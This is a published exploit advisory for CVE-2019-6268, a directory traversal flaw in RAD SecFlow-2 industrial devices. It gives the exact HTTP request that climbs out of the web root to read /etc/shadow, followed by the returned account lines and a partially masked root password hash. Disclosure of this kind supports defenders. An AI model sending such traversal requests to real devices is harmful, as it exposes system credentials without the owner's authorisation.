RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 suffer from a directory traversal vulnerability.
4fc9777bae6431fffff54a5e1e945548b2d134853e189f941d1edbb9e6269023# Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63
# Date: 3/2024
# CVE: CVE-2019-6268
# Exploit Author: Branko Milicevic
RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.
Steps to reproduce:
Request:
GET /../../../../../../../../../../etc/shadow HTTP/1.1
Response:
HTTP/1.1 200 OK
root:nDnjJ****ydh3:11851:0:99999:7:::
bin:*:11851:0:99999:7:::
daemon:*:11851:0:99999:7:::
adm:*:11851:0:99999:7:::
lp:*:11851:0:99999:7:::
sync:*:11851:0:99999:7:::
shutdown:*:11851:0:99999:7:::
Vulnerability Type
Directory Traversal
Attack Vectors
Unauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).
Reference
https://www.owasp.org/index.php/Path_Traversal
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed